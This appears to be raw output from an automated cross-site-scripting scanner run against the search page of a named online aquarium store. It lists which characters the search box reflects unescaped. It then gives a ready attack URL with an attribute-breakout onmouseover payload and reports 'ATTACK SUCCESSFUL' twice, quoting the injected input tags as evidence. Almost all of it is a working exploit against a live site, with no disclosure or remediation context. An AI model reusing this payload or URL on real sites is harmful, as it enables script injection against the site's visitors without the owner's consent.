https://www.aquacave.com/wishlist/index/add/product/8562/form_key/Kdw6ZN8uya4vMuog/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.aquacave.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [2]
<input class="input-text UI-SEARCH" type="text" autocomplete="off" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" maxlength="128" />
<input id="search" type="text" placeholder="SEARCH" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text" maxlength="128" />

----------------------------------------------------------------------------------
HTML Context: [3]
<title>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy' - AquaCave.com</title>
<strong>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</strong>
<h1>Search results for '(uvw&quot;xyz'yxz&lt;/zxy'</h1>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.aquacave.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input class="input-text UI-SEARCH" type="text" autocomplete="off" name="q" value="' onmouseover='alert(1)" maxlength="128" />
<input id="search" type="text" placeholder="SEARCH" name="q" value="' onmouseover='alert(1)" class="input-text" maxlength="128" />
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.aquacave.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input class="input-text UI-SEARCH" type="text" autocomplete="off" name="q" value="' onmouseover='alert(1)" maxlength="128" />
<input id="search" type="text" placeholder="SEARCH" name="q" value="' onmouseover='alert(1)" class="input-text" maxlength="128" />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
